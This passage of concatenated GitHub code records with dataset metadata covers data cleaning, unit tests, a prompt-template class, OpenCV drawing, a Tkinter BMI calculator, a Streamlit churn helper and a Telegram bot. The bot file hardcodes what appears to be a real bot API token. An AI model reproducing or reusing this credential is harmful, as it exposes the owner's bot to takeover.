/usr/bin/python3\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.cluster import MiniBatchKMeans\n\ndata = pd.read_csv('../train.csv')\nY = data['opened']\nX = data.columns.tolist()\nX.remove('opened')\nX.remove('open_time')\nX = data[X]\n\nY = Y.as_matrix()\nX = X.as_matrix()\n\nnp.savetxt('../data.txt', X)\nnp.savetxt('../label.txt', Y)\n","repo_name":"pin3da/data-science","sub_path":"final/src/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6591260847","text":"'''\nCreated on Mar 21, 2020\n\n@author: natehuang\n'''\nimport unittest\nimport csv\nimport numpy as np\nfrom ImpactModel.Regression import regression\nfrom numpy.testing._private.utils import assert_allclose\n\nclass Test(unittest.TestCase):\n\n def testRegression(self):\n np.random.seed(1)\n # create a fake eta and beta\n x = np.random.rand(2)\n # generate fake data\n with open('test_regression.csv', 'w', newline='\\n') as f:\n data_writer = csv.writer(f)\n for i in range(30):\n if i%10 == 0:\n data_writer.writerow(['Day%i'%(i//9), \n 'X[%i]'%(i//9), \n 'V[%i]'%(i//9), \n 'sigma[%i]'%(i//9), \n 'h[%i]'%(i//9)])\n else:\n generater1 = np.random.rand()\n generater2 = np.random.rand() + generater1\n s = np.random.rand()/100 + 0.01\n # write the fake data into csv\n data_writer.writerow([None, 1e9*generater1, 1e9*generater2, s, \n regression.impact_cost_fun(x, 1e9*generater1, 1e9*generater2, s, 0)])\n if i%10==9:\n data_writer.writerow([None, None, None, None, None])\n\n reg = regression(filepath = 'test_regression.csv')\n result = reg.compute_eta_beta(regression.impact_cost_fun)[0]\n assert_allclose(result, x, rtol=1e-5)\n \n # Output from assignment2_part1_input\n inputTest = regression(filepath = 'assignment2_part1_input.csv')\n r = inputTest.compute_eta_beta(regression.impact_cost_fun)[0]\n print('Choose day0 = 20070705, day1 = 20070802, day3 = 20070904')\n print('The regression result of assignment2_part1_input is:', r)\n ","repo_name":"nateehuang/AlgorTradingGithub","sub_path":"Homework2/ImpactModel/Test_Regression.py","file_name":"Test_Regression.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35344697743","text":"\"\"\"\nautobyteus/prompt/prompt_template.py\n\nThis module contains the PromptTemplate class, which represents a prompt that may contain various template variables.\n\nPromptTemplate class features:\n- The raw template string.\n- A list of associated PromptTemplateVariable instances.\n- A method to convert the prompt template to a dictionary representation for frontend communication.\n\"\"\"\n\nfrom autobyteus.prompt.prompt_template_variable import PromptTemplateVariable\n\n\nclass PromptTemplate:\n def __init__(self, template: str, variables: list[PromptTemplateVariable] = None):\n self.template = template\n self.variables = variables if variables is not None else []\n\n def to_dict(self) -> dict:\n \"\"\"\n Converts the PromptTemplate instance to a dictionary representation.\n\n Returns:\n dict: Dictionary representation of the PromptTemplate instance.\n \"\"\"\n return {\n \"template\": self.template,\n \"variables\": [variable.to_dict() for variable in self.variables]\n }\n \n def fill(self, values: dict) -> str:\n \"\"\"\n Fill the template using the provided values.\n\n Args:\n values (dict): Dictionary containing variable names as keys and their respective 
values.\n\n Returns:\n str: The filled template string.\n \n Raises:\n KeyError: If a required variable is missing from the provided values.\n \"\"\"\n try:\n return self.template.format(**values)\n except KeyError as e:\n raise KeyError(f\"Missing value for template variable: {e}\")\n\n","repo_name":"AutoByteus/autobyteus","sub_path":"autobyteus/prompt/prompt_template.py","file_name":"prompt_template.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"17840235505","text":"import telebot\nbot = telebot.TeleBot('1723704255:AAEMH1m1C5r2WNrKfGkHpLUN_78lu3Yg_xs')\n\n@bot.message_handler(commands=['start', 'help'])\ndef send_welcome(message):\n bot.reply_to(message, f'Я бот-расписание и помогу тебе не опоздать на урок. Приятно познакомиться, {message.from_user.first_name}')\n\n@bot.message_handler(content_types=['text'])\ndef get_text_messages(message):\n if message.text.lower() == 'привет':\n bot.send_message(message.from_user.id, 'Привет!')\n else:\n bot.send_message(message.from_user.id, 'Не понимаю, что это значит.')\n\nbot.polling(none_stop=True)\n","repo_name":"natali-art/UchRasp","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"40555429321","text":"import cv2 as cv\nimport numpy as np\n\nblank = np.zeros((500,500, 3), dtype='uint8')\n# cv.imshow('Blank', blank)\n\n# IMPORTANT COLOR IS = BGR\n\n# 1. Paint the image a certain color\n# blank[:] = 255, 255, 255\n# blank[200:300] = 0,0,255\n# blank[:,200:300] = 0,0,255\n# cv.imshow('England Flag', blank)\n\n# 2. Draw a Rectangle\n# source, sudut1, sudut2, warna, ketebalan\n# 0,50 = x=0 , y=50 \n# 250, 0 = x=250, y=0 \n# thikness = -1 (filled) atau 2\nprint(len(blank))\ncv.rectangle(blank, (0,0), (blank.shape[1]//2, blank.shape[0]//2), (0,255,255), thickness=-1)\ncv.rectangle(blank, (blank.shape[1]//2, blank.shape[0]//2), (blank.shape[1], blank.shape[0]), (0,255,255), thickness=-1)\n# cv.imshow('Rectangle', blank)\n\n\n# 3. Draw a Circle\n# source, center, radius, color, ketebalan\ncv.circle(blank, (250, 250), 40, (0,0,255), thickness=-1)\n# cv.imshow('Circle', blank)\n\n# 4. Draw a Line\ncv.line(blank, (0,500), (500,0), (255,255,255), thickness=5)\n# cv.imshow(\"Line\", blank)\n\n# 5. Draw Eclipse\n# src, center, axes, angle, startAngle, endAngle, color, thikness\ncv.ellipse(blank,(250,375),(100,50),0,0,180,(255,255,255),-1)\n\n\n# 6. 
Write a Text\n# src, text, titik mulai, font, font scale, color, thikness\ncv.putText(blank, \"Nuclear\", (145,125), cv.FONT_HERSHEY_TRIPLEX,1.5, (255,255,255), 3)\ncv.imshow(\"Text\", blank)\n\n\n\ncv.waitKey(0)\n","repo_name":"ToKu404/basic-open-cv","sub_path":"learn03_draw.py","file_name":"learn03_draw.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21573129676","text":"# Lawrence McAfee\n\n# ~~~~~~~~ import ~~~~~~~~\nfrom modules.node.HierNode import HierNode\nfrom modules.node.LeafNode import LeafNode\nfrom modules.node.Stage import Stage\nfrom modules.node.block.CodeBlock import CodeBlock as cbk\nfrom modules.node.block.ImageBlock import ImageBlock as ibk\nfrom modules.node.block.MarkdownBlock import MarkdownBlock as mbk\n\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nblocks = [\n mbk(\"The best hyperplane that linearly separates two classes is identified as the line lying at the largest margin from the nearest vectors at the boundary of the two classes.\"),\n mbk(\"In Figure 22-3, we observe that the best hyperplane is the line at the exact center of the two classes and constitutes the largest margin between both classes. Hence, this optimal hyperplane is also known as the largest margin classifier.\"),\n ibk(None, \"Figure 22-3. The largest margin classifier\"),\n mbk(\"The boundary points of the respective classes which are known as the support vectors are essential in finding the optimal hyperplane. The support vectors are illustrated in Figure 22-4. The boundary points are called support vectors because they are used to determine the maximum distance between the class they belong to and the discriminant function separating the classes.\"),\n ibk(None, \"Figure 22-4. 
Support vectors\"),\n mbk(\"The mathematical formulation for finding the margin and consequently the hyperplane that maximizes the margin is beyond the scope of this book, but suffice to say this technique involves the Lagrange multiplier.\"),\n]\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nclass Content(LeafNode):\n def __init__(self):\n super().__init__(\n \"Finding the Optimal Hyperplane\",\n Stage.REMOVE_EXTRANEOUS,\n Stage.ORIG_BLOCKS,\n # Stage.CUSTOM_BLOCKS,\n # Stage.ORIG_FIGURES,\n # Stage.CUSTOM_FIGURES,\n # Stage.CUSTOM_EXERCISES,\n )\n self.add(mbk(\"# Finding the Optimal Hyperplane\"))\n [self.add(a) for a in blocks]\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nclass Findingthe(HierNode):\n def __init__(self):\n super().__init__(\"Finding the Optimal Hyperplane\")\n self.add(Content())\n\n# eof\n","repo_name":"nimra/module_gen","sub_path":"nodes/Bisong19Building/E_PartIV/E_Chapter22/A_WhatIs/A_Findingthe/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21292742827","text":"from tkinter import *\n\ndef leftclickbutton(event):\n LableResalt.configure(text =int(textBoxWeight.get())//((float(textBoxHeight.get())/100)**2))\n Resalt = int(textBoxWeight.get())//((float(textBoxHeight.get())/100)**2)\n if int(Resalt) > 30:\n Labletotal.configure(text = \"อ้วนมาก\",bg='orange')\n elif int(Resalt) >= 25:\n Labletotal.configure(text = \"อ้วน\",bg='orange')\n elif int(Resalt) >= 23:\n Labletotal.configure(text=\"น้ำหนักเกิน\",bg='orange')\n elif int(Resalt) >= 18.6:\n Labletotal.configure(text=\"น้ำหนักปกติ เหมาะสม\",bg='orange')\n else:\n Labletotal.configure(text=\"ผอมเกินไป\",bg='orange')\n\nMainWindow = Tk()\nLableHeight = Label(MainWindow,text = \"ส่วนสูง (cm)\")\nLableHeight.grid(row=0,column=0)\n\ntextBoxHeight = Entry(MainWindow)\ntextBoxHeight.grid(row=0,column=1)\n\nLableWeight = Label(MainWindow,text = \"น้ำหนัก (Kg)\")\nLableWeight.grid(row=1,column=0)\n\ntextBoxWeight = Entry(MainWindow)\ntextBoxWeight.grid(row=1,column=1)\n\nCalculateButton = Button(MainWindow,text =\"คำนวณ\",bg='orange')\nCalculateButton.grid(row=2,column=0)\nCalculateButton.bind('', leftclickbutton)\n\nLableResalt = Label(MainWindow,text = \"ผลลัพธ์\")\nLableResalt.grid(row=2,column=1)\n\nLabletotal = Label(MainWindow)\nLabletotal.grid(row=3,column=1)\n\nMainWindow.mainloop()","repo_name":"MonkeyZ-04/Cp3_Nonthpawit_S","sub_path":"Exercise21.py","file_name":"Exercise21.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"19444487036","text":"import pickle\nimport pandas as pd\nimport streamlit as st\n\n\n# encoding Gender\nwith open('../data/ML/pkl/encodingGender.pkl', 'rb') as gender:\n encoding_gender = pickle.load(gender)\n\n# encoding Multiple Lines \nwith open('../data/ML/pkl/encodingMultiple Lines.pkl', 'rb') as multiple_lines:\n encoding_multiple_lines = pickle.load(multiple_lines)\n\n# encoding Streaming TV \nwith open('../data/ML/pkl/encodingStreaming TV.pkl', 'rb') as streaming_tv:\n encoding_streaming_tv = pickle.load(streaming_tv)\n\n# encoding Streaming Movies\nwith open('../data/ML/pkl/encodingStreaming Movies.pkl', 'rb') as streaming_movies:\n encoding_streaming_movies = pickle.load(streaming_movies)\n\n# encoding Streaming Music\nwith open('../data/ML/pkl/encodingStreaming Music.pkl', 
'rb') as streaming_music:\n encoding_streaming_music = pickle.load(streaming_music)\n\n# encoding Device Protection \nwith open('../data/ML/pkl/encodingDevice Protection Plan.pkl', 'rb') as protection:\n encoding_protection = pickle.load(protection)\n\n# encoding Internet Type\nwith open('../data/ML/pkl/encodingInternet Type.pkl', 'rb') as internet_type:\n encoding_internet_type = pickle.load(internet_type)\n\n#encoding Married\nwith open('../data/ML/pkl/encodingMarried.pkl', 'rb') as married:\n encoding_married = pickle.load(married)\n\n#encoding Online Backup\nwith open('../data/ML/pkl/encodingOnline Backup.pkl', 'rb') as online_backup:\n encoding_online_backup = pickle.load(online_backup)\n\n#encoding Online Security\nwith open('../data/ML/pkl/encodingOnline Security.pkl', 'rb') as online_security:\n encoding_online_security = pickle.load(online_security)\n\n#encoding Paperless Billing\nwith open('../data/ML/pkl/encodingPaperless Billing.pkl', 'rb') as paperless:\n encoding_paperless = pickle.load(paperless)\n\n#encoding Payment Method\nwith open('../data/ML/pkl/encodingPayment Method.pkl', 'rb') as payment:\n encoding_payment_method= pickle.load(payment)\n\n#encoding Premium Tech Support \nwith open('../data/ML/pkl/encodingPremium Tech Support.pkl', 'rb') as premium_support:\n encoding_premium_support = pickle.load(premium_support)\n\n#encoding Unlimited Data\nwith open('../data/ML/pkl/encodingUnlimited Data.pkl','rb') as unlimited_data:\n encoding_unlimited_data = pickle.load(unlimited_data)\n\n#encoding Phone Service \nwith open('../data/ML/pkl/encodingPhone Service.pkl','rb') as phone_service:\n encoding_phone_service = pickle.load(phone_service)\n\n# encoding map \n\n# encoding Contract\n\nmap_contract = {\"Month-to-Month\": 1, \n \"One Year\": 0, \"Two Year\":0}\n\n# encoding Offer\nmap_offer = {\"Offer A\": 0, \"Offer B\": 1,\"Offer C\":1,\"Offer D\":2,\"Offer E\":3, \"None\":4}\n\n\n\n# Best Model \n\nwith open('../data/ML/pkl/mejor_modelo.pkl', 'rb') as modelo:\n modelo = pickle.load(modelo)\n\n\n\n\n# We define functions to predict my churn probability\n\ndef user_input_features():\n # encoding \n married_ = st.selectbox('Married',(\"Yes\",\"No\") ) \n Phone_Service_ = st.selectbox('Phone Service', (\"Yes\",\"No\")) \n Internet_Type_ = st.selectbox('Internet Type', (\"Fiber Optic\",\"DSL\",\"None\",\"Cable\")) \n Online_Security_ = st.selectbox('Online Security', (\"Yes\",\"No\")) \n Online_Backup_ = st.selectbox('Online Backup', (\"Yes\",\"No\")) \n Devive_protection_plan_ = st.selectbox('Device Protection Plan', (\"No\",\"Yes\")) \n Premium_Tech_Support_ = st.selectbox('Premium Tech Support', (\"Yes\",\"No\")) \n Unlimited_Data_ = st.selectbox('Unlimited Data', (\"No\",\"Yes\")) \n Paperless_Billing_ = st.selectbox('Paperless Billing', (\"Yes\",\"No\")) \n Payment_Method_ = st.selectbox('Payment Method', (\"Credit Card\",\"Mailed Check\",\"Bank Withdrawal\" ))\n Gender_ = st.selectbox('Gender', (\"Female\",\"Male\"))\n Multiple_Lines_ = st.selectbox('Multiple Lines', (\"Yes\",\"No\"))\n Streaming_TV_ = st.selectbox('Streaming TV',(\"Yes\",\"No\"))\n Streaming_Music_ = st.selectbox('Streaming Music', (\"Yes\",\"No\"))\n Streaming_Movies_ = st.selectbox('Streaming Movies', (\"Yes\",\"No\"))\n Contract_ = st.selectbox('Contract', (\"One Year\",\"Two Year\",\"Month-to-Month\"))\n Offer_ = st.selectbox('Offer', (\"None\",\"Offer A\",\"Offer B\",\"Offer C\",\"Offer D\",\"Offer E\"))\n\n #numeric \n\n Age_ = st.sidebar.slider('Age', 18,80,45)\n Number_of_Dependents = 
st.sidebar.slider('Number of Dependents', 0,10,2)\n Number_of_Referrals = st.sidebar.slider('Number of Referrals', 0,15,0)\n Avg_Monthly_GB_Download = st.sidebar.slider('Avg Monthly GB Download', 0,100,17)\n Total_Revenue = st.sidebar.slider('Total Revenue', 20, 15000,10000)\n Satisfaction_Score = st.sidebar.slider('Satisfaction Score',1,5,2)\n CLTV = st.sidebar.slider('CLTV',2000,7000, 5337)\n \n\n data = {'Married': married_,\n 'Phone Service': Phone_Service_,\n 'Internet Type': Internet_Type_,\n 'Online Security': Online_Security_,\n 'Online Backup': Online_Backup_,\n 'Device Protection Plan': Devive_protection_plan_,\n 'Premium Tech Support': Premium_Tech_Support_,\n 'Unlimited Data': Unlimited_Data_,\n 'Paperless Billing': Paperless_Billing_,\n 'Payment Method': Payment_Method_,\n 'Gender': Gender_,\n 'Multiple Lines': Multiple_Lines_,\n 'Streaming TV': Streaming_TV_,\n 'Streaming Music': Streaming_Music_,\n 'Streaming Movies': Streaming_Movies_,\n 'Contract': Contract_,\n 'Offer': Offer_,\n \n 'Age': Age_,\n 'Number of Dependents': Number_of_Dependents,\n 'Number of Referrals': Number_of_Referrals,\n 'Avg Monthly GB Download': Avg_Monthly_GB_Download,\n 'Total Revenue': Total_Revenue,\n 'Satisfaction Score': Satisfaction_Score,\n 'CLTV': CLTV,\n }\n\n return pd.DataFrame(data, index=[0])\n\n\n\ndef prediction_churn (user_dataframe, modelo):\n predic = modelo.predict(user_dataframe)[0]\n \n prob = modelo.predict_proba(user_dataframe)\n \n return predic, prob","repo_name":"luceromendozab/Churn_Project","sub_path":"streamlit/src/soporte.py","file_name":"soporte.py","file_ext":"py","file_size_in_byte":5995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"13630197213","text":"import random\nfrom faker import Faker\nfrom rut_chile import rut_chile\nfrom constants import RUT_LOWER_RANGE, RUT_UPPER_RANGE, ACCOUNT_NUMBER_LOWER_RANGE, ACCOUNT_NUMBER_UPPER_RANGE, BANK_NAMES, ACCOUNT_TYPES, BOOLEANS\n\n\nclass Generate:\n @staticmethod\n def rut(with_dots=False) -> str:\n rut_number = str(random.randint(RUT_LOWER_RANGE, RUT_UPPER_RANGE))\n verificatior_digit = rut_chile.get_verification_digit(rut_number)\n return rut_chile.format_rut('{}{}'.format(rut_number, verificatior_digit), with_dots=with_dots)\n\n @staticmethod\n def account_number(account_type: str, rut: str) -> str:\n if account_type == 'Cuenta rut':\n display = random.choice(BOOLEANS)\n if display:\n return rut[:-2]\n else:\n return ''\n return str(random.randint(ACCOUNT_NUMBER_LOWER_RANGE, ACCOUNT_NUMBER_UPPER_RANGE))\n\n @staticmethod\n def bank_name() -> str:\n return random.choice(BANK_NAMES)\n\n @staticmethod\n def account_type() -> str:\n return random.choice(ACCOUNT_TYPES)\n","repo_name":"pahaeussler/getMyTransferInfo","sub_path":"generateData/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29923508291","text":"import argparse\nimport csv\nimport json\nimport os\nimport sys\nimport time\nfrom multiprocessing import Pool\n\nimport numpy as np\n\nsys.path.append('..')\nfrom src.global_constants_and_functions import is_float, str_to_float_or_int\n\n\ndef get_pairs_of_factors_from_autoplot_csv(filename):\n with open(filename, mode='r', encoding='utf-8') as f:\n csv_reader = csv.reader(f, delimiter=';')\n pairs_of_factor = [i[:2] for i in csv_reader][1:]\n # print(pairs_of_factor)\n return pairs_of_factor\n\n\ndef 
get_data_from_csv(filename):\n with open(filename, mode='r', encoding='utf-8') as f:\n csv_reader = list(csv.reader(f, delimiter=';'))\n # print(csv_reader)\n # print({i[0]: i[1:] for i in zip(*csv_reader)})\n return {i[0]: tuple([j for j in i[1:]]) for i in zip(*csv_reader)}\n\n\ndef combine_pairs_of_factors(data_from_autoplot, data_from_data_csv):\n \"\"\"\n :param data_from_autoplot: result of get_pairs_of_factors_from_autoplot_csv\n :param data_from_data_csv: result of get_data_from_boundaries_csv\n :return: {'factor1+factor2':[(valuex1,valuey1),(valuex2, valuey2)...]}\n \"\"\"\n result_dict = {}\n for i in data_from_autoplot:\n key = '{}+{}'.format(i[0], i[1])\n x_factor = data_from_data_csv[i[0]]\n y_factor = data_from_data_csv[i[1]]\n # print(x_factor)\n # print(y_factor)\n # remove na and nans:\n # print(str_to_float_or_int(i[1]))\n result_dict[key] = [[(str_to_float_or_int(j[0])), str_to_float_or_int(j[1])] for j in\n list(zip(x_factor, y_factor)) if\n is_float(j[0]) and is_float(j[1])]\n # print(result_dict)\n return result_dict\n\n\ndef get_intervals_from_boundaries(data_from_boundaries_csv, wanted_factor_on_x_axis):\n numbers_of_buckets = data_from_boundaries_csv['']\n interval_borders = data_from_boundaries_csv[wanted_factor_on_x_axis]\n return [[int(i[0]), str_to_float_or_int(i[1])] for i in zip(numbers_of_buckets, interval_borders) if\n is_float(i[0]) and is_float(i[1])]\n\n\ndef split_into_intervals(combined_pair_of_factors, intervals, wanted_factor_pair):\n # print(combined_pair_of_factors[wanted_factor_pair])\n # print(intervals)\n # print(combined_pair_of_factors)\n # x_vals = [i[0] for i in combined_pair_of_factors[wanted_factor_pair]]\n # print('combined pairs are:')\n # print(wanted_factor_pair)\n # print(combined_pair_of_factors)\n # print(combined_pair_of_factors[wanted_factor_pair])\n # y_vals = [i[1] for i in combined_pair_of_factors[wanted_factor_pair]]\n x_vals = [i[0] for i in combined_pair_of_factors]\n y_vals = [i[1] for i in combined_pair_of_factors]\n # print(x_vals)\n # print(y_vals)\n max_x = max(x_vals)\n min_x = min(x_vals)\n\n factors_splitted_into_bins = [[] for i in range(0, len(intervals))]\n borders = [i[1] for i in intervals]\n borders_for_digitizing = np.array(borders)\n borders = [str_to_float_or_int(i[1]) for i in intervals]\n bucket_numbers = [i[0] for i in intervals]\n x_vals_np_array = np.array(x_vals)\n # print(x_vals_np_array)\n indices = np.digitize([i for i in x_vals_np_array], borders_for_digitizing, right=False)\n # print(indices)\n # print(x_vals)\n # print(combined_pair_of_factors)\n # print(x_vals_np_array)\n # print(borders)\n # print(intervals)\n # print(min(indices))\n # print(max(indices))\n len(factors_splitted_into_bins)\n # sys.exit()\n for i in range(0, len(indices)):\n factors_splitted_into_bins[indices[i] - 1].append([x_vals[i], y_vals[i]])\n # print(factors_splitted_into_bins)\n # print(bucket_numbers)\n # print(borders)\n return list(factors_splitted_into_bins), bucket_numbers, list(borders), min_x, max_x, min(y_vals), max(y_vals), len(\n x_vals)\n\n\ndef compute_data_for_interval(pairs_of_values_in_interval, bucket_number, border_low, border_high,\n is_highest_bucket=False, is_lowest_bucket=True):\n # if bucket is empty\n # print(pairs_of_values_in_interval)\n\n # basic bucket - returned if bucket is empty\n bucket = {\n \"BucketOrdinalNumber\": bucket_number,\n \"StructureCountInBucket\": len(pairs_of_values_in_interval),\n \"XfactorFrom\": {\n \"XfactorFromIsInfinity\": False,\n \"XfactorFromOpenInterval\": False,\n 
\"XfactorFromValue\": None\n },\n \"XfactorTo\": {\n \"XfactorToIsInfinity\": False,\n \"XfactorToOpenInterval\": not is_highest_bucket,\n \"XfactorToValue\": None\n },\n \"YfactorAverage\": None,\n \"YfactorHighQuartile\": None,\n \"YfactorLowQuartile\": None,\n \"YfactorMaximum\": None,\n \"YfactorMedian\": None,\n \"YfactorMinimum\": None\n }\n\n if pairs_of_values_in_interval:\n x_factor = [i[0] for i in pairs_of_values_in_interval]\n y_factor = [i[1] for i in pairs_of_values_in_interval]\n if is_lowest_bucket:\n if min(x_factor) <= border_low:\n bucket[\"XfactorFrom\"][\"XfactorFromValue\"] = min(x_factor)\n bucket[\"XfactorTo\"][\"XfactorToValue\"] = border_high\n elif is_highest_bucket:\n bucket[\"XfactorFrom\"][\"XfactorFromValue\"] = border_low\n if max(x_factor) >= border_high:\n bucket[\"XfactorTo\"][\"XfactorToValue\"] = max(x_factor)\n else:\n bucket[\"XfactorFrom\"][\"XfactorFromValue\"] = border_low\n bucket[\"XfactorTo\"][\"XfactorToValue\"] = border_high\n bucket[\"YfactorAverage\"] = np.average(y_factor)\n bucket[\"YfactorHighQuartile\"] = np.quantile(y_factor, 0.75)\n bucket[\"YfactorLowQuartile\"] = np.quantile(y_factor, 0.25)\n bucket[\"YfactorMaximum\"] = max(y_factor)\n bucket[\"YfactorMedian\"] = np.median(y_factor)\n bucket[\"YfactorMinimum\"] = min(y_factor)\n\n if is_lowest_bucket:\n bucket[\"XfactorFrom\"][\"XfactorFromValue\"] = min(x_factor)\n if is_highest_bucket:\n bucket[\"XfactorTo\"][\"XfactorToValue\"] = max(x_factor)\n\n return bucket\n\n\ndef create_json(filename, folder, dictionary_to_output):\n with open(os.path.join(folder, filename), mode='w+', encoding='utf-8') as json_file:\n json.dump(dictionary_to_output, json_file, indent=4)\n\n\ndef get_name_translations(filename):\n with open(filename, encoding='utf-8') as f:\n nametranslation_list_of_dicts = json.load(f)\n return nametranslation_list_of_dicts\n\n\ndef get_familiar_name(nametranslation_list_of_dicts, factor_id):\n for i in nametranslation_list_of_dicts:\n if i['ID'].lower() == factor_id.lower():\n return i['FamiliarName']\n return factor_id\n\n\ndef create_json_for_pair(key, value, data_from_boundaries, result_folder, nametranslations_json):\n nametranslations_list_of_dicts = get_name_translations(nametranslations_json)\n try:\n # print(key.split('+')[0])\n # print(data_from_boundaries)\n intervals = get_intervals_from_boundaries(data_from_boundaries, key.split('+')[0])\n factors_splitted_into_bins, bucket_numbers, borders, min_x, max_x, min_y, max_y, length = split_into_intervals(\n value, intervals, key)\n result_dict = {'GraphBuckets': [],\n 'StructureCount': length,\n 'XfactorGlobalMaximum': max_x,\n 'XfactorGlobalMinimum': min_x,\n 'XfactorName': get_familiar_name(nametranslations_list_of_dicts, key.split('+')[0]),\n 'YfactorGlobalMaximum': max_y,\n 'YfactorGlobalMinimum': min_y,\n 'YfactorName': get_familiar_name(nametranslations_list_of_dicts, key.split('+')[1])\n }\n j = 1\n last_bucket = False\n k = 0\n first_bucket = True\n for pair, number in zip(factors_splitted_into_bins, bucket_numbers):\n if j == len(factors_splitted_into_bins):\n last_bucket = True\n if k > 0:\n first_bucket = False\n border_low = borders[k]\n try:\n border_high = borders[k + 1]\n except IndexError:\n border_high = 0 # does not matter\n result_dict['GraphBuckets'].append(\n compute_data_for_interval(pair, number, border_low, border_high, last_bucket, first_bucket))\n j += 1\n k += 1\n create_json(key + '.json', result_folder, result_dict)\n except Exception as e:\n print('Unable to create json for pair 
{}'.format(str(key)))\n print(str(e))\n\n\ndef get_results(filename_autoplots, filename_boundaries, filename_data_csv, result_folder, nametranslations_json,\n cpu_cores_count=1):\n pairs_of_factors = get_pairs_of_factors_from_autoplot_csv(filename_autoplots)\n data_from_boundaries = get_data_from_csv(filename_boundaries)\n data_from_data_csv = get_data_from_csv(filename_data_csv)\n # intervals = data_from_boundaries\n combined_pairs_of_factors_with_key = combine_pairs_of_factors(pairs_of_factors, data_from_data_csv)\n # for key, value in combined_pairs_of_factors_with_key.items():\n # create_json_for_pair(key, value, data_from_boundaries, result_folder)\n # parallel:\n pool = Pool(cpu_cores_count)\n arguments_for_create_json = [list(i) + [data_from_boundaries] + [result_folder] + [nametranslations_json] for i in\n list(combined_pairs_of_factors_with_key.items())]\n pool.starmap_async(create_json_for_pair, arguments_for_create_json).get()\n pool.close()\n pool.join()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Script for generating .json file for charts')\n parser.add_argument('filename_autoplots', help='ususally autoplot.csv file', type=str)\n parser.add_argument('filename_boundaries', help='usually boundaries.csv file', type=str)\n parser.add_argument('filename_data_csv', help='usually data.csv file', type=str)\n parser.add_argument('result_folder',\n help='Folder for result. Keep in mind, that existing files will be overwritten', type=str)\n parser.add_argument('nametranslations_json',\n help='Json file (e.g. available on ValTrends db download page), '\n 'that translates factor ID to human readable factor description',\n type=str)\n parser.add_argument('--cpu_count', '-c', nargs='?', const=1, default=1, help='Cpu count',\n type=int)\n args = parser.parse_args()\n start = time.time()\n get_results(args.filename_autoplots, args.filename_boundaries, args.filename_data_csv, args.result_folder,\n args.nametranslations_json,\n args.cpu_count)\n end = time.time()\n print(\"Computing data and creating json files lasted {:.3f} seconds\".format(end - start))\n","repo_name":"pali08/dipl_thesis","sub_path":"src/exe_get_json_precomputed_charts.py","file_name":"exe_get_json_precomputed_charts.py","file_ext":"py","file_size_in_byte":10905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39543341206","text":"# unit_test.py\n\nfrom os.path import exists\nfrom files import read_csv, read_file, write_csv, write_file\n\ndef test_user(user):\n try:\n test_name(user)\n try:\n test_email(user)\n print(user.name() + \" was successully checked!\")\n except AssertionError:\n print(\"User: \" + user.name() +\" doesn't have an email!\")\n except AssertionError:\n print(\"User doesn't have a name!\")\n \n \ndef test_create():\n user = create_user('Nik','Jones','jone2032@bears.unco.edu')\n #print(user.firstname)\n #return user\n #assert(user.email in locals())\n assert('user' in locals()) ## <<< is this actually checking the existance of object user or a string \"user\"?\n #assert(user not in locals()) \n\ndef test_create_multiple():\n user1 = create_user('Nik','Jones','jone2032@bears.unco.edu')\n user2 = create_user('Bobby','Hermsmeyer','herm1004@bears.unco.edu')\n user3 = create_user('Jake','Loki','loki7156@bears.unco.edu')\n user4 = create_user('David','Voss','voss5834@bears.unco.edu')\n user5 = create_user('Sid','Campe','camp6969@bears.unco.edu')\n users = 
[['Nik','Jones','jone2032@bears.unco.edu'],['Bobby','Hermsmeyer','herm1004@bears.unco.edu'],['Jake','Loki','loki7156@bears.unco.edu'],['David','Voss','voss5834@bears.unco.edu'],['Sid','Campe','camp6969@bears.unco.edu'],['','',''],['a','b','']]\n write_csv('users.csv',users)\n\nclass User():\n firstname = \"\"\n lastname = \"\"\n email = \"\"\n\n def __init__(self, fname, lname, email):\n self.firstname = fname\n self.lastname = lname\n self.email = email\n \n def name(self):\n name = self.firstname + ' ' + self.lastname\n assert(name != \" \")\n return name\n\ndef create_user(fname, lname, email):\n user = User(fname,lname,email)\n return user\n\ndef test_name(user):\n test = user.name()\n answer = user.firstname + ' ' + user.lastname\n assert(test == answer)\n #assert(test != answer)\n\ndef test_email(user):\n answer = user.email\n assert(answer != \"\")\n #assert(answer == \"\")\n \n\ndef test_all_users_from(path):\n #if(path.exists):\n users = read_csv(path)\n for i in users:\n fname = i[0]\n lname = i[1]\n email = i[2]\n newUser = create_user(fname,lname,email)\n test_user(newUser)\n \n\nif __name__ == \"__main__\":\n test_create()\n test_create_multiple()\n test_all_users_from('users.csv')\n\n ## confusion on the try catch\n ## are we removing the asserts and replacing with 